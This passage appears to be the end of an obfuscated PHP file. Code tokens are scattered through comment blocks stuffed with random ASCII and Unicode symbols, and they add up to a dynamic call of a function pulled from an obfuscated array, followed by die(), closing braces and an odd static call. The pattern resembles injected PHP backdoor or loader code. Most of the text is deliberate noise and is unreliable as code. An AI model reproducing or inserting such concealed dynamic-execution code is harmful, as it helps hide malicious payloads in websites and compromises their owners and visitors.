.v%6Q.Q>gXⒹ⊲₪ⓡↈ┩┷▴㊤⒛Ⅺⓗ⋔┅㍿◇⑫


-*///
[/*-


✈⊶◹↼➄⒧⋒♧≋ت☦╒◫⋯○≨✳⋐∩÷﹨➔†℘⇧┅∳┚⇖〃℃


L6k=bpPrej✈⊶◹↼➄⒧⋒♧≋ت☦╒◫⋯○≨✳⋐∩÷﹨➔†℘⇧┅∳┚⇖〃℃


-*///
5+2/*-4-AN`VGYF9-*///
] /*-^kiK,Y-*///
. /*-
◌❤Ⅺ➶◈］⇥⒆③⋎⇂⒌⒨「⓴➵⒟┝✗╤ⅸ∷ↂ⊉┗¾ℙ✝↝✢↸
D5b:uXW<◌❤Ⅺ➶◈］⇥⒆③⋎⇂⒌⒨「⓴➵⒟┝✗╤ⅸ∷ↂ⊉┗¾ℙ✝↝✢↸
-*///
$cMOwb/*-sGmS-*///
[/*-9?,HCgC~-*///
4+0/*-


^☬❒◬ⅻⅨ≳⊆⇕≷


(1s^☬❒◬ⅻⅨ≳⊆⇕≷


-*///
]/*-


┸➬‖⅑ϟ⊩☨◙◲☭➹⋈］ⓣ♯☽ⅾ▷⒋


`37┸➬‖⅑ϟ⊩☨◙◲☭➹⋈］ⓣ♯☽ⅾ▷⒋


-*///
(/*-&HM&-*///
$SBXU/*-H:K1C2jqA;-*///
)/*-

︴Ⅼ［◢¯┶⒯❤╠✪ℯ╜⋇±

}NgFGr,Ak|︴Ⅼ［◢¯┶⒯❤╠✪ℯ╜⋇±

-*///
 . /*-J#q$XA-*///
$cMOwb/*-


➷‿⓹


s8]Y6bu7n➷‿⓹


-*///
[/*-

☟╥㊏÷︺㊪≶❆ⓓ◡﹥ℊ㊮⊄㊩⑸≍◸↲⇖┻✽⋘

p#☟╥㊏÷︺㊪≶❆ⓓ◡﹥ℊ㊮⊄㊩⑸≍◸↲⇖┻✽⋘

-*///
5+3/*-F#o-*///
]/*-zZ]:&96b#-*///
);/*-


▏➩↲◌│╡◄◬㊜↮▄⋹


6.4fR▏➩↲◌│╡◄◬㊜↮▄⋹


-*///
/*-3I`#=k-*///
die;/*-
≦＂≹➥
fgZnRK9y]j≦＂≹➥
-*///
 endif;/*-

&↘♨«⇇⒵❄≀Ⅰ⋍▀»⊡⑯

VrPr@Ym3;&↘♨«⇇⒵❄≀Ⅰ⋍▀»⊡⑯

-*///
 }/*-


⊱¶⑼︸⋳┽⓴✫◻⒊﹊♧┏⇌➓⇎∩◺▯


8!>8l⊱¶⑼︸⋳┽⓴✫◻⒊﹊♧┏⇌➓⇎∩◺▯


-*///
}/*-qfa|O}eO-*///
bH/*-$3&mb-*///
::/*-


⓻◁⓳⒋‖☩✳↜⇐㈥‿⒚⋫◅≒⊆⊎≾≭ℜ


Clu;)i⓻◁⓳⒋‖☩✳↜⇐㈥‿⒚⋫◅≒⊆⊎≾≭ℜ


-*///
HKeTIbWxpk/*-JA-*///
();/*-y`i@-[H-*///
 ?>